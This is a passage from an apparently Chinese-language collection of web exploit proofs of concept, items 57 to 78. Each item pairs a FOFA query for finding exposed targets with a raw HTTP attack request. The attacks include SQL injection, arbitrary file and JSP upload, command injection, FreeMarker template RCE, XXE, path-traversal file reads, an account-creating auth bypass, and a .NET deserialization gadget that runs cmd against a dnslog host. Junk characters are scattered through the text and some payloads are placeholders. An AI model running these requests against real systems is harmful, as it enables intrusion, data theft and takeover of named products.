# p( ?! E1 C- x0 }3 H" u2 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
+ C$ h" \) H+ B; @Content-Type: application/json& E8 J' S% h2 K2 {
; {! C8 z* y4 \! ~0 ~{
) f$ k- y* K# Q; }( E "storeID":{8 p+ d, p+ z: T/ {0 A; h
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
0 f+ W% a8 ^$ | "MethodName":"Start",
( `, Y, p" W; P9 j5 F "ObjectInstance":{. _0 N# Y& t& w
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
7 K; N. w/ |' W( z' W "StartInfo": {
9 b$ H: X( D7 A$ _9 P" _6 ^+ G "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
: N' @' U5 {8 Y$ m; I: G "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"; g3 b* [; t8 d; _3 d9 h
}
% ~0 u9 Z; n( x% l }
* C' A1 G( r+ e; l) x2 c e' W }" z/ T1 V! A5 N
}8 s' |1 Y) {1 R3 }0 [% k6 Q$ [
2 V) i, p- L, k& J+ S; |, c6 j% B# h! h# D
57. 畅捷通T+ keyEdit.aspx SQL注入; s2 l% E0 p7 r& A
FOFA:app="畅捷通-TPlus"
$ S$ M# u( V/ ~GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.13 D. V% N& K2 m& S, _
Host: host; r' Q- n) ?( O8 t( P. Z8 r& o
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36- E, g" a1 P0 G. |1 Q6 ]4 |8 c7 n
Accept-Charset: utf-8
4 p8 B0 Z |7 R2 u; QAccept-Encoding: gzip, deflate. Q/ O4 ]. r& P8 j* Z
Connection: close
6 J* z$ Q% |5 ]8 Y9 X% ~; v0 M" ^- u0 A' T/ _% P" u9 ~( X% Z8 {: T5 \6 N
+ b; Z% ^; T s3 e3 T
58. 畅捷通T+ KeyInfoList.aspx sql注入
7 i! p# x8 d5 Q1 g+ @FOFA:app="畅捷通-TPlus"
4 l( ]! \$ m; l& n; f/ x: xGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.10 S+ h1 T- E, \8 s! q: h
Host: your-ip
* ^( U! H! _9 B0 j: c+ BUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36' G% F W$ B1 }/ O5 Q f3 K
Accept-Charset: utf-8
1 }- o% U! ~# [Accept-Encoding: gzip, deflate
% S* n/ ~ x3 W$ ^0 m4 Q1 ~/ DConnection: close( J, x' I8 E: e
, t5 R4 ]! a4 [7 v7 D8 _; \
5 ^" Y0 u- O. j& q9 b$ W59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行+ C7 p# @/ _1 D. x& [) P
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
7 F7 ]& ]; u( ^" } n& yPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
# f+ z/ w. {4 R4 L+ I/ n0 Z9 wHost: 192.168.86.128:9090
0 O* h! G3 Q6 g. K' x) `User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36+ a3 z- P4 m+ i/ X9 ^/ ^
Connection: close
6 `; c- a G$ [Content-Length: 1669
- N& e O" y! q3 cAccept: */** r' `1 E0 B; y4 A6 U. |1 [( _
Accept-Language: en2 v6 K3 \5 T5 H1 P% Q8 n
Content-Type: application/x-www-form-urlencoded, c: j9 J I; E6 t% E$ m) T
Accept-Encoding: gzip I6 v8 M* x A7 U+ R
F; Y2 _+ c$ c' J9 t6 f. X% zPAYLOAD3 ~; N, J& d# P$ `+ n
/ T* w* x4 }$ A' h
: J5 L7 B' f# G5 Q60. 百卓Smart管理平台 importexport.php SQL注入
8 x2 e! S1 a: _FOFA:title="Smart管理平台"4 U. g) c- h+ D8 @$ F5 S
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
) \! N# X& J) VHost:+ M- e: s) z: w# x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 ^' b% O& q2 t7 ^' [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ j8 L! m% n9 H/ j' l/ L9 m5 W, q
Accept-Encoding: gzip, deflate2 a8 N9 x1 z! Y' R7 ?/ n
Accept-Language: zh-CN,zh;q=0.9$ z Q- [ f" K5 F
Connection: close
. S% X @, E/ R# e- N+ y
) `8 W4 W! e4 {6 c# O) W, t+ U; T% N: @ E; }/ v4 i# R* ]
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传" {/ M( {) T& V* J5 n+ d
FOFA: title="欢迎使用浙大恩特客户资源管理系统". N0 o( h, [7 z# H
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
. u1 U; O; }7 q: }/ o. kHost: x.x.x.x) q+ M- V, O4 W; |! h2 t4 ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' V& l5 T1 Z- s3 H
Connection: close
% t) U9 w9 _ \; TContent-Length: 27 ?/ w: l) i3 O
Accept: */*
/ |2 k5 r2 g6 y8 [Accept-Encoding: gzip, deflate0 k5 M. g N* }/ H3 m( l3 ]/ v4 Z, a/ p& H
Accept-Language: en
8 ~& y$ |" o7 N! D# S' O5 AContent-Type: application/x-www-form-urlencoded' @ L- l/ c# s7 K+ u2 D/ P
" L% Q) ?" e D/ k: w
8uxssX66eqrqtKObcVa0kid98xa n# N+ u9 r" p1 Q
! r7 V! g Q# Y" F
7 P$ F7 e8 N& t% i! @! |
62. IP-guard WebServer 远程命令执行) S: C! @6 R5 Y
FOFA:"IP-guard" && icon_hash="2030860561"
0 J" ?) }3 @ E9 n) p. x- cGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
. f$ l q# H9 ~+ e' G0 O6 ?Host: x.x.x.x0 B& x$ S( Q1 R/ ^0 `& E6 c
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36, [' Q0 \5 U$ f, o% ?. Z9 \
Connection: close
( Q7 D7 p4 A' ^* P- {0 C/ o$ W" `Accept: */* ]1 @4 W! _. [8 g+ ]! I2 y/ Y6 W5 k
Accept-Language: en; f; {2 ?0 F& f
Accept-Encoding: gzip
5 g0 C4 I' i1 c: @0 d8 Z: y$ F; v* ? S; o3 Y
, J* |" r/ m' w7 w访问
% R+ T, t) w! i5 z+ d4 i
# V5 c/ P$ `4 p2 w2 u0 P X% {* ?GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.18 E2 r) j5 C0 h" B
Host: x.x.x.x: w& S6 h& K. ^5 w, } B2 p
: z: b* ?- p! L
: i( j- v+ e& z, b$ M) n
63. IP-guard WebServer任意文件读取
" s0 h8 H; d: |9 @1 c6 W' IIP-guard < 4.82.0609.0
# k- s( \ Q2 wFOFA:icon_hash="2030860561"
; k0 Z( R" z8 B% M2 CPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
1 C/ i" U% p" `% `% y- r/ lHost: your-ip
' r- T4 W6 R, d* F# Q9 `) Q& R% }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36# N' b _8 Q3 Q& K! O$ Z+ @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 M% v& Z @! Z; ~
Accept-Encoding: gzip, deflate q/ C5 `6 F; P6 x2 E2 q' a
Accept-Language: zh-CN,zh;q=0.9- O/ I9 E/ \2 U
Connection: close
3 e" H# j& m, ?) g, n2 gContent-Type: application/x-www-form-urlencoded' g& l/ O2 S6 {2 U6 H
8 j( ^+ ?! }3 @
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
- b, q; x3 c0 P0 P" m: O1 k3 z/ z- a" z
64. 捷诚管理信息系统CWSFinanceCommon SQL注入& m' W3 K- N0 T/ P
FOFA:body="/Scripts/EnjoyMsg.js"
7 f; S$ a& D9 T9 wPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
% o. i( Y( T5 r2 ?( `2 EHost: 192.168.86.128:9001
4 ?- u2 P# W$ `+ P& f& LUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
: j5 c: F9 L0 s' d: {* VConnection: close
: ]( T. c4 e1 E: m7 v7 b, hContent-Length: 369
5 x9 `- l) {* D, X! E9 u& g: ]Accept: */*
% N, c1 P- v, w+ G/ I* BAccept-Language: en; V1 M j; N0 B; |* x) I
Content-Type: text/xml; charset=utf-82 V, e; d& e# z2 j
Accept-Encoding: gzip1 f6 W( r" z1 [. v, I) x
0 t! \; x: I Y& {5 W3 D! J<?xml version="1.0" encoding="utf-8"?>
, p9 E7 \3 k/ ]. F$ G<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">8 a! a2 S( O- H" O8 Y3 ?$ n3 F
<soap:Body>6 d( G$ u% Q5 x0 e" A
<GetOSpById xmlns="http://tempuri.org/">
b6 V1 S* B. V( l" z+ f3 a <sId>1';waitfor delay '0:0:5'--+</sId>
1 B h5 t7 _- {8 J' o2 ` </GetOSpById>
4 H' T8 i0 s6 J7 Z2 w0 q8 d </soap:Body>
" L, Y: o9 S% w" e4 \2 w1 V</soap:Envelope>* m8 S6 M6 g1 W
! g& d2 V7 r3 R" \% B8 q2 D
6 h6 E% V7 A# B- t# M; c65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过. J' G) Q( n, ]4 r% ]9 O
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台") `! j5 J h* \1 f- a- C% {. B3 f
响应200即成功创建账号test123456/123456$ P4 B2 S5 ^6 Y& |/ S" V
POST /SystemMng.ashx HTTP/1.1
) |, E [6 q1 P$ bHost:
3 W8 P) j U) ?. M q/ w: CUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
$ ]5 U( T0 v! @Accept-Encoding: gzip, deflate: G% a" G/ c3 Q; ]' H
Accept: */*
T! y4 }; L4 M- C6 a9 XConnection: close/ H. H/ f6 [8 r9 \$ T
Accept-Language: en
Z! b6 t! M- J, v6 Y' ?+ D4 [Content-Length: 174
# j3 T9 D4 g6 f6 n+ P% B" |, Q; D
~ T- r4 _6 w1 o" Y( poperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators+ `6 ~0 Q+ h ^3 c: ^/ I2 ]. n0 ~
* d& g1 O8 b' ^' _! F- X7 y# }
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
9 d1 m! b: y. H. DFOFA:app="万户ezOFFICE协同管理平台", [6 a3 Y5 O( g* L1 j
9 P1 H% r- K/ P. [3 KGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.13 J: ^1 e& \) G& F4 \: q! {& N% B
Host: x.x.x.x
/ h* I3 B3 y9 X: j4 T$ b* X2 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
( Z7 w p+ U* oConnection: close( u' j7 s7 {/ r, y" U
Accept: */*
1 a, @% D9 `, V3 UAccept-Language: en( a% _$ h% {* {
Accept-Encoding: gzip# ?- H$ v2 ^6 I/ u9 v, [) i
% d* X$ Q6 U" _- M& l" M
5 a( o; o$ o2 h) L第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在$ V8 ^. q) a8 `" ^3 N* h$ k7 H
$ `$ F. }2 d' H, C" L7 |67. 万户ezOFFICE wpsservlet任意文件上传
% }$ `9 k2 G! JFOFA:app="万户网络-ezOFFICE"2 t6 k/ H* o- p1 d* f
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型/ z9 q5 O. k3 L
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
% g9 v1 A. ]+ \6 ]% J8 ~. o( k) N4 jHost: x.x.x.x; ], J$ t- d. e" s1 `! c
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
& k) n6 I' ~% T; Y9 }9 A. t0 aContent-Length: 1739 c& H5 ?" K8 l6 a6 u o/ g& l' v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8# O! J5 F! X( R! T1 b: X
Accept-Encoding: gzip, deflate. k- I: m4 v$ m- v) c
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3$ u. e; {' n2 T& S" y% t6 y; E k
Connection: close
, S: G5 m V3 u2 O8 P. LContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
U% e3 y: c+ `" ]) ODNT: 1
( G; c, E1 e1 d" p. g3 q; ZUpgrade-Insecure-Requests: 1
* l6 F6 e6 R, n; w( h) _, ~7 T
. j+ F1 A% v6 k( c6 {--ufuadpxathqvxfqnuyuqaozvseiueerp1 n/ P) D1 z0 f9 Q; \8 C
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
5 `3 @, O) S# K$ w5 O. J
1 k7 V& X! ?( g% E% C+ E<% out.print("sasdfghjkj");%>7 m, f6 E- D \$ b) V
--ufuadpxathqvxfqnuyuqaozvseiueerp--
, }3 [' e3 ?9 h1 g) Q/ z
4 @0 r& e8 e2 j# b5 q, H
! W8 n6 s! U i$ C文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp1 t& g$ f k/ K4 ]
" b6 F. p, H/ b+ b& z8 n' R
68. 万户ezOFFICE wf_printnum.jsp SQL注入
( I0 G" Q7 V+ r5 X4 iFOFA:app="万户ezOFFICE协同管理平台"1 R) ]5 C" z& _5 e/ |" v
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.13 _& k& g$ j1 ^. d/ v: M& J1 |8 m, v
Host: {{host}}/ z& G( V( ?- j0 ~, w' I* D* b% {0 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.365 e9 L9 @4 q, q$ P9 v8 [
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
0 l( ]: N4 P# U2 A& p: _$ P( V. _$ B8 ~# [Accept-Encoding: gzip, deflate) I6 K9 U4 i; d
Accept-Language: zh-CN,zh;q=0.9
" X7 C4 L' W/ i3 \Connection: close
! `9 N% c' d6 M6 K' a6 p
* {0 s: \0 X+ L/ y% a% X) Q0 ?3 D: i ~$ j& @* l# S( ?
69. 万户 ezOFFICE contract_gd.jsp SQL注入
! d) E6 ] x( S* M) a( SFOFA:app="万户ezOFFICE协同管理平台"/ g% `6 F4 F. W$ y# R1 `
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
+ y! o8 Z6 G! E, Z5 C2 c1 k" dHost: your-ip
0 y) K B& I( ?' C8 J0 R) GUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36' ^' Z1 J1 r' n9 z
Accept-Encoding: gzip, deflate% b$ L j) ^& x4 M# N; P7 |8 u
Accept: */*
. \' x8 f+ D% u8 u8 J- k8 c# pConnection: keep-alive4 q0 Q" R: K6 y: K
( k2 m) p! e* k- Q9 n
& W" e% O/ j7 d3 H' | n) W
70. 万户ezEIP success 命令执行
4 S8 y" ^1 b# U4 L$ ^9 NFOFA:app="万户网络-ezEIP") ?& Z+ {& _( K
POST /member/success.aspx HTTP/1.1
) Q5 Y$ r8 |, J7 V, h, Y5 Y0 cHost: {{Hostname}}
7 L' f/ U, ?* iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.366 s" q3 f( s% I4 @6 S
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
9 ~# O9 h, m. P, t( {5 y! wContent-Type: application/x-www-form-urlencoded
) y0 L0 d. W+ n' `TYPE: C' K4 o' Z5 H0 Q2 d
Content-Length: 16702$ K( @( T9 y& |/ n
! @/ j/ h9 g! `, }! b' f__VIEWSTATE=PAYLOAD
2 t' \; j- O/ a: ]: c [7 p
! x2 l! _# }, o* j: D; [, K( J1 }& h; w8 K6 X
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
* X& F1 u P5 d* Z3 C9 ?' A5 @FOFA:body="PM2项目管理系统BS版增强工具.zip"
& F5 Z0 ^7 d5 @3 rGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1+ X& f. O: R( R/ z4 C2 V1 A
Host: x.x.x.xx.x.x.x
* G& j5 S5 ^2 s$ p: w6 IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
2 H f) o% V" W2 w1 ?Connection: close8 N; N$ F* U8 c1 i+ f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 u! }& j! _' _ N( f3 Z3 t# OAccept-Encoding: gzip, deflate7 ]6 V, z* F+ s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! B' c* O H/ Z6 t1 e X7 OUpgrade-Insecure-Requests: 1* b; F8 ?$ j5 |( H
6 L1 i3 e V Z
% L8 e- h/ ^% x" B, h- P( i
72. 致远OA getAjaxDataServlet XXE k8 Y2 E8 Q1 J$ j
FOFA:app="致远互联-OA"/ f% {7 s4 Y$ ]
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
& T R; n5 G/ FHost: 192.168.40.131:8099
1 _- y! w+ ~/ u4 |: wUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
' h" K' ^2 `( U( d- `% YConnection: close
8 c V# [6 s0 X7 c& a' X- sContent-Length: 583
' e* J- ]" W5 z0 R2 FContent-Type: application/x-www-form-urlencoded
2 S K" | G) M$ ?* HAccept-Encoding: gzip
" j% a0 b5 k+ s" N8 w1 a" Y: q$ b* P. p+ J3 T
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E8 N5 G1 Z3 E8 A8 V
) ~, b# z5 K' T3 d, t& J
2 C' ^3 k' i/ x l* ~9 B73. GeoServer wms远程代码执行
: y0 o" g1 x" s: cFOFA:icon_hash=”97540678”
! g- A m) p: U, B2 nPOST /geoserver/wms HTTP/1.16 \) k, u) M7 g. I) N
Host:, x+ O/ W/ `7 C2 D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.363 U4 s' b v, ^# `
Content-Length: 1981
" v* c8 i2 F E+ @( k) u! vAccept-Encoding: gzip, deflate
7 h) } \6 v5 L2 x: P% IConnection: close
" R# _ A9 [8 ~2 B9 p9 Y5 IContent-Type: application/xml* _) U. K( k7 Y: _6 ^# Q
SL-CE-SUID: 3' E) T! B0 x7 T6 m, N& o. i5 n/ ~
; a& @9 T2 h+ `2 H- {PAYLOAD: o2 l1 R; v' A' H' S. t3 i
/ h5 o0 D) _9 B9 Q" v6 v1 e. C+ D
1 z$ s* F* x( _" ^2 }( j
74. 致远M3-server 6_1sp1 反序列化RCE
P" S# s3 j) d! r: u# `2 _FOFA:title="M3-Server"
3 [& G3 B' j6 l2 n5 B4 pPAYLOAD% R0 h5 `$ c" y
@, \$ f* p6 C
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
& y6 B8 G' o4 g: m/ a1 C7 Q1 `FOFA:app="TELESQUARE-TLR-2005KSH"
* u) X. {# y7 P0 KGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.12 K7 f) D" q( i: d9 ^- a
Host: x.x.x.x
' ^; W: P$ q ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! |. H4 i& b+ W8 f7 @
Connection: close
k* I: y$ ]. L2 K5 B8 }( YAccept: */*: u5 D+ x- i5 r k
Accept-Language: en* ?9 F( X2 u6 U# L! p( }( O% G
Accept-Encoding: gzip
# j5 e: ~4 y- Q& u, [' t9 t2 q
z4 Q3 n& G) N; I6 K* x2 `
GET /cgi-bin/test28256.txt HTTP/1.1% | U+ F$ U* E& C9 o, }3 ]
Host: x.x.x.x
) X: H. ?& z% S8 I7 n# C9 O; B6 P! M" u' h4 _: _% @4 f
9 s0 C- Z8 \( o% `4 J5 E
76. 新开普掌上校园服务管理平台service.action远程命令执行
* M: p& X6 D8 p# f$ a ?* W; fFOFA:title="掌上校园服务管理平台"9 l7 c- m9 y% n: M, b
POST /service_transport/service.action HTTP/1.1
3 X3 w0 q) A6 b6 c4 DHost: x.x.x.x- z! |9 }' P' k6 K8 f+ Q% Q5 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.08 D. @3 V1 A7 H0 A' H# M
Connection: close% U8 E* N) l5 R: ]# |0 U# ]1 E
Content-Length: 211& l* u3 B# q. U$ S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 `* F' l0 J! p1 i& |
Accept-Encoding: gzip, deflate ?3 H9 g R, t+ v+ ?' u0 L+ g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- V6 N- J. X7 {
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4! w2 v1 [7 P, s' m5 k
Upgrade-Insecure-Requests: 15 @; D# ]$ d2 Q" o; K3 o
, S" f0 w5 U/ C+ _, p{
! `" F7 W4 ]9 V$ C/ R"command": "GetFZinfo",1 g. ^- l6 {- {; ]4 F& I
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
$ c- V8 Q: A/ i ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}", y9 s6 c" X6 }% C# T' v
}
' K, f1 `- V M% r. k5 h8 w& H* h& p+ Z
8 x/ y! W7 b/ T
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
, S, n8 I' W+ THost: x.x.x.x
! u% g& I; R8 f- n' e5 D
% l) E+ N( z2 e. w: M* s! d7 E1 z7 a9 p4 i2 [' Q# L. H+ }( |, q
A8 n! o4 l/ u1 H/ I# i* y77. F22服装管理软件系统UploadHandler.ashx任意文件上传
( Z1 P2 ^0 X+ _- e9 HFOFA:body="F22WEB登陆"3 c: U) y4 t8 g" Y3 |
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
; _2 n! d2 L9 s3 R/ q# l0 ^. gHost: x.x.x.x
+ e6 U- c* {+ B( M' i: O1 e& [; eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 p6 j Y; ^8 p* c. f; lConnection: close1 U# B3 I% G) v) h' U& A4 U# h
Content-Length: 433
6 }: f! h j/ gAccept: */*
2 `3 z: V8 i$ O0 l4 Y f; cAccept-Encoding: gzip, deflate! C& q# B% }- r5 u" H
Accept-Language: zh-CN,zh;q=0.9
0 V4 D; v, }8 G. C! RContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix+ l. o: W1 b0 c
9 w, p9 E+ t- s0 u( s- n, u2 x
------------398jnjVTTlDVXHlE7yYnfwBoix
9 ^1 T8 P: K( ZContent-Disposition: form-data; name="folder"' j" {) v1 v9 g; c- b5 B6 w
5 W$ F; Q8 ]$ j+ G" Y/upload/udplog
' X7 L; `1 W# \% Z------------398jnjVTTlDVXHlE7yYnfwBoix( f7 D+ c) @) ~, }6 ]% H
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"9 `4 p9 x: O9 _, h6 {3 }
Content-Type: application/octet-stream( o/ G ? M f& e$ x; n
4 V6 _/ Z9 e) `. t
hello1234567
; u2 W+ K! i7 F6 H# \& v M------------398jnjVTTlDVXHlE7yYnfwBoix" J6 O# ^) {( o' @
Content-Disposition: form-data; name="Upload"
- s ^2 W- e7 }& L6 B8 q; V5 d! M% [
+ U+ J, J( o4 ?6 SSubmit Query
' W3 N8 A3 H: Z0 h------------398jnjVTTlDVXHlE7yYnfwBoix--
8 U0 M/ @! |" S1 a
' P3 D$ B" R X! u( _' ?3 E3 R6 n* V v8 R# O$ J& l+ U
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
9 z8 o; `4 c* `1 Z! CFOFA:icon_hash="2001627082"
+ \+ f; ^4 n {1 fPOST /Platform/System/FileUpload.ashx HTTP/1.1
8 J- N" t% s% `% _* X9 p! z; i0 D6 nHost: x.x.x.x
! O$ ^2 t+ a' i. B; B% PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% }# y3 ^$ z$ f7 }# U- o5 O' [: S
Connection: close
# G5 D" p1 X% C; @ h, mContent-Length: 336
8 a/ F. I+ M) b& _4 nAccept-Encoding: gzip
0 y2 X \: t5 YContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l3 ]$ X" ?1 \7 h$ \; w, o
4 j$ [: m4 M5 T2 ~1 f
------YsOxWxSvj1KyZow1PTsh98fdu6l
' {* t, U; i. |, j" I' kContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
2 ]: g' N. H) r( T( W pContent-Type: image/png
6 t' B3 K" j7 i& x0 m" s4 Q, x
A, y7 r" g" x1 e, `YsOxWxSvj1KyZow1PTsh98fdu6l+ l1 D/ B3 C2 i' w
------YsOxWxSvj1KyZow1PTsh98fdu6l. _' P! T9 `2 I9 W5 o
Content-Disposition: form-data; name="target"
: {- H' O- P# A
8 A7 K6 V7 `. v- c5 I9 c+ D5 T/Applications/SkillDevelopAndEHS/# S8 W2 k( N. C7 ^
------YsOxWxSvj1KyZow1PTsh98fdu6l--+ J' A: j4 e# m1 @# c& A! z+ z
/ l: w, l' Y+ P
